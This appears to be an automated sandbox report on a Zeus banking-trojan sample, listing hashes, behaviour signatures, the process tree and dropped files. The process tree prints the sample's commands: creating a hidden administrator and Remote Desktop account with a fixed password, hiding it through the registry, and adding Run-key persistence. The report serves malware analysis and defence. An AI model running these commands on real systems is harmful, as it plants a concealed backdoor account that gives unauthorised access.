Analysis
-
max time kernel
150s -
max time network
124s -
platform
windows7_x64 -
resource
win7 -
submitted
19-07-2020 16:48
Static task
static1
Behavioral task
behavioral1
Sample
zeus 2_2.1.0.3.vir.exe
Resource
win7
Behavioral task
behavioral2
Sample
zeus 2_2.1.0.3.vir.exe
Resource
win10v200430
General
-
Target
zeus 2_2.1.0.3.vir.exe
-
Size
199KB
-
MD5
dc6b98b9707c0922ab6a53b3efdd5dac
-
SHA1
a72e76fbd5dfa53b3d27ed9d9e6d194a085d7d0e
-
SHA256
f55d6bd5f13356eda64fae070a5eee1a080f06a0aa69bdd7e137496d88346be3
-
SHA512
04b730c73876fc89eb465ebc069ad1e1bdbfbf5d1654a4bb49457d87ec290dd1832a571dea47adabea0d3f3c0461f8ce70d10fe2e4a82cbb698fed254c5d269b
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
ifob.exepid process 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe 792 ifob.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
WinMail.exepid process 1544 WinMail.exe -
Executes dropped EXE 4 IoCs
Processes:
new.exenew.exeifob.exeifob.exepid process 1028 new.exe 2028 new.exe 1272 ifob.exe 792 ifob.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
new.exeifob.execmd.exedescription pid process target process PID 1028 set thread context of 2028 1028 new.exe new.exe PID 1272 set thread context of 792 1272 ifob.exe ifob.exe PID 1068 set thread context of 1300 1068 cmd.exe PING.EXE -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
new.exezeus 2_2.1.0.3.vir.exeWinMail.execmd.exedescription pid process Token: SeSecurityPrivilege 2028 new.exe Token: SeSecurityPrivilege 1612 zeus 2_2.1.0.3.vir.exe Token: SeSecurityPrivilege 1612 zeus 2_2.1.0.3.vir.exe Token: SeManageVolumePrivilege 1544 WinMail.exe Token: SeSecurityPrivilege 1068 cmd.exe Token: SeSecurityPrivilege 1068 cmd.exe -
Modifies WinLogon 2 TTPs 3 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\rootid = "0" reg.exe -
Runs ping.exe 1 TTPs 7 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 1804 PING.EXE 1416 PING.EXE 1944 PING.EXE 1156 PING.EXE 664 PING.EXE 1716 PING.EXE 1300 PING.EXE -
Suspicious use of WriteProcessMemory 172 IoCs
Processes:
zeus 2_2.1.0.3.vir.execmd.exenet.exenet.exenet.exenet.exenew.exedescription pid process target process PID 1612 wrote to memory of 1068 1612 zeus 2_2.1.0.3.vir.exe cmd.exe PID 1612 wrote to memory of 1068 1612 zeus 2_2.1.0.3.vir.exe cmd.exe PID 1612 wrote to memory of 1068 1612 zeus 2_2.1.0.3.vir.exe cmd.exe PID 1612 wrote to memory of 1068 1612 zeus 2_2.1.0.3.vir.exe cmd.exe PID 1612 wrote to memory of 1536 1612 zeus 2_2.1.0.3.vir.exe cscript.exe PID 1612 wrote to memory of 1536 1612 zeus 2_2.1.0.3.vir.exe cscript.exe PID 1612 wrote to memory of 1536 1612 zeus 2_2.1.0.3.vir.exe cscript.exe PID 1612 wrote to memory of 1536 1612 zeus 2_2.1.0.3.vir.exe cscript.exe PID 1068 wrote to memory of 1804 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1804 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1804 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1804 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1416 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1416 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1416 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1416 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1944 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1944 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1944 1068 cmd.exe PING.EXE PID 1068 wrote to memory of 1944 1068 cmd.exe PING.EXE PID 1612 wrote to memory of 1968 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 1968 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 1968 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 1968 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1968 wrote to memory of 1300 1968 net.exe net1.exe PID 1968 wrote to memory of 1300 1968 net.exe net1.exe PID 1968 wrote to memory of 1300 1968 net.exe net1.exe PID 1968 wrote to memory of 1300 1968 net.exe net1.exe PID 1612 wrote to memory of 1836 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 1836 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 1836 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 1836 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1836 wrote to memory of 1908 1836 net.exe net1.exe PID 1836 wrote to memory of 1908 1836 net.exe net1.exe PID 1836 wrote to memory of 1908 1836 net.exe net1.exe PID 1836 wrote to memory of 1908 1836 net.exe net1.exe PID 1612 wrote to memory of 2004 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 2004 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 2004 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 2004 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 2004 wrote to memory of 1584 2004 net.exe net1.exe PID 2004 wrote to memory of 1584 2004 net.exe net1.exe PID 2004 wrote to memory of 1584 2004 net.exe net1.exe PID 2004 wrote to memory of 1584 2004 net.exe net1.exe PID 1612 wrote to memory of 1656 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 1656 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 1656 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1612 wrote to memory of 1656 1612 zeus 2_2.1.0.3.vir.exe net.exe PID 1656 wrote to memory of 1688 1656 net.exe net1.exe PID 1656 wrote to memory of 1688 1656 net.exe net1.exe PID 1656 wrote to memory of 1688 1656 net.exe net1.exe PID 1656 wrote to memory of 1688 1656 net.exe net1.exe PID 1612 wrote to memory of 1632 1612 zeus 2_2.1.0.3.vir.exe reg.exe PID 1612 wrote to memory of 1632 1612 zeus 2_2.1.0.3.vir.exe reg.exe PID 1612 wrote to memory of 1632 1612 zeus 2_2.1.0.3.vir.exe reg.exe PID 1612 wrote to memory of 1632 1612 zeus 2_2.1.0.3.vir.exe reg.exe PID 1612 wrote to memory of 1028 1612 zeus 2_2.1.0.3.vir.exe new.exe PID 1612 wrote to memory of 1028 1612 zeus 2_2.1.0.3.vir.exe new.exe PID 1612 wrote to memory of 1028 1612 zeus 2_2.1.0.3.vir.exe new.exe PID 1612 wrote to memory of 1028 1612 zeus 2_2.1.0.3.vir.exe new.exe PID 1028 wrote to memory of 2028 1028 new.exe new.exe PID 1028 wrote to memory of 2028 1028 new.exe new.exe PID 1028 wrote to memory of 2028 1028 new.exe new.exe PID 1028 wrote to memory of 2028 1028 new.exe new.exe -
Loads dropped DLL 5 IoCs
Processes:
zeus 2_2.1.0.3.vir.exenew.exenew.exepid process 1612 zeus 2_2.1.0.3.vir.exe 1612 zeus 2_2.1.0.3.vir.exe 1028 new.exe 2028 new.exe 2028 new.exe -
Runs net.exe
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Processes:
zeus 2_2.1.0.3.vir.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Privacy zeus 2_2.1.0.3.vir.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Privacy\CleanCookies = "0" zeus 2_2.1.0.3.vir.exe -
NTFS ADS 1 IoCs
Processes:
WinMail.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Inbox\541917F1-00000001.eml:OECustomProperty WinMail.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
zeus 2_2.1.0.3.vir.exeifob.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\disable_nasty_checks = "setx SEE_MASK_NOZONECHECKS 1" zeus 2_2.1.0.3.vir.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\Currentversion\Run ifob.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\{2A246F39-F0CA-97F1-81D9-8A67E94802A0} = "C:\\Users\\Admin\\AppData\\Roaming\\Dera\\ifob.exe" ifob.exe
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\zeus 2_2.1.0.3.vir.exe"C:\Users\Admin\AppData\Local\Temp\zeus 2_2.1.0.3.vir.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Modifies Internet Explorer settings
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\delme.bat" "3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cscript.execscript ldapdi.vbs3⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe user rootid Stormload0987 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user rootid Stormload0987 /add4⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe localgroup Administrators rootid /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators rootid /add4⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe localgroup "Remote Desktop Users" rootid /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" rootid /add4⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe accounts /maxpwage:unlimited3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited4⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v rootid /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Users\Admin\AppData\Local\Temp\new.exenew.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\new.exe"C:\Users\Admin\AppData\Local\Temp\new.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Dera\ifob.exe"C:\Users\Admin\AppData\Roaming\Dera\ifob.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Dera\ifob.exe"C:\Users\Admin\AppData\Roaming\Dera\ifob.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp75392daa.bat"5⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1795011195-1625797998-142733676-1073621974243985992704183383-665834837-721666196"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1885619546-1357878500-104955189414995788351548612191-6565673801931841097832449507"1⤵
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail.exe" -Embedding1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of AdjustPrivilegeToken
- NTFS ADS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\delme.bat
-
C:\Users\Admin\AppData\Local\Temp\ldapdi.vbs
-
C:\Users\Admin\AppData\Local\Temp\new.exe
-
C:\Users\Admin\AppData\Local\Temp\new.exe
-
C:\Users\Admin\AppData\Local\Temp\new.exe
-
C:\Users\Admin\AppData\Local\Temp\tmp75392daa.bat
-
C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
-
C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
-
C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
-
C:\Users\Admin\AppData\Roaming\Onfo\qoreo.gii
-
C:\Users\Admin\AppData\Roaming\Onfo\qoreo.gii
-
\??\PIPE\samr
-
\Users\Admin\AppData\Local\Temp\new.exe
-
\Users\Admin\AppData\Local\Temp\new.exe
-
\Users\Admin\AppData\Local\Temp\new.exe
-
\Users\Admin\AppData\Roaming\Dera\ifob.exe
-
\Users\Admin\AppData\Roaming\Dera\ifob.exe
-
memory/664-43-0x0000000000000000-mapping.dmp
-
memory/792-35-0x000000000040D562-mapping.dmp
-
memory/892-38-0x0000000000000000-mapping.dmp
-
memory/1028-20-0x0000000000000000-mapping.dmp
-
memory/1068-0-0x0000000000000000-mapping.dmp
-
memory/1068-57-0x0000000000000000-mapping.dmp
-
memory/1156-28-0x0000000000000000-mapping.dmp
-
memory/1272-31-0x0000000000000000-mapping.dmp
-
memory/1300-59-0x0000000000050000-0x0000000000077000-memory.dmpFilesize
156KB
-
memory/1300-9-0x0000000000000000-mapping.dmp
-
memory/1300-60-0x000000000005D1DF-mapping.dmp
-
memory/1416-5-0x0000000000000000-mapping.dmp
-
memory/1536-7-0x0000000002850000-0x0000000002854000-memory.dmpFilesize
16KB
-
memory/1536-1-0x0000000000000000-mapping.dmp
-
memory/1544-52-0x0000000003AF0000-0x0000000003AF2000-memory.dmpFilesize
8KB
-
memory/1544-53-0x0000000003AE0000-0x0000000003AE2000-memory.dmpFilesize
8KB
-
memory/1544-68-0x0000000003E70000-0x0000000003E72000-memory.dmpFilesize
8KB
-
memory/1544-67-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-66-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-65-0x0000000003DD0000-0x0000000003DD2000-memory.dmpFilesize
8KB
-
memory/1544-64-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-40-0x0000000003890000-0x0000000003990000-memory.dmpFilesize
1024KB
-
memory/1544-42-0x0000000003890000-0x0000000003A90000-memory.dmpFilesize
2.0MB
-
memory/1544-63-0x0000000003BC0000-0x0000000003BC2000-memory.dmpFilesize
8KB
-
memory/1544-45-0x0000000003890000-0x0000000003990000-memory.dmpFilesize
1024KB
-
memory/1544-46-0x0000000003890000-0x0000000003A90000-memory.dmpFilesize
2.0MB
-
memory/1544-47-0x0000000003990000-0x0000000003A90000-memory.dmpFilesize
1024KB
-
memory/1544-51-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-62-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-61-0x0000000003E40000-0x0000000003E42000-memory.dmpFilesize
8KB
-
memory/1544-54-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-55-0x0000000003E60000-0x0000000003E62000-memory.dmpFilesize
8KB
-
memory/1584-13-0x0000000000000000-mapping.dmp
-
memory/1632-17-0x0000000000000000-mapping.dmp
-
memory/1656-15-0x0000000000000000-mapping.dmp
-
memory/1688-16-0x0000000000000000-mapping.dmp
-
memory/1716-56-0x0000000000000000-mapping.dmp
-
memory/1804-4-0x0000000000000000-mapping.dmp
-
memory/1836-10-0x0000000000000000-mapping.dmp
-
memory/1908-11-0x0000000000000000-mapping.dmp
-
memory/1944-6-0x0000000000000000-mapping.dmp
-
memory/1968-8-0x0000000000000000-mapping.dmp
-
memory/2004-12-0x0000000000000000-mapping.dmp
-
memory/2028-24-0x0000000000400000-0x0000000000427000-memory.dmpFilesize
156KB
-
memory/2028-25-0x000000000040D562-mapping.dmp
-
memory/2028-27-0x0000000000400000-0x0000000000427000-memory.dmpFilesize
156KB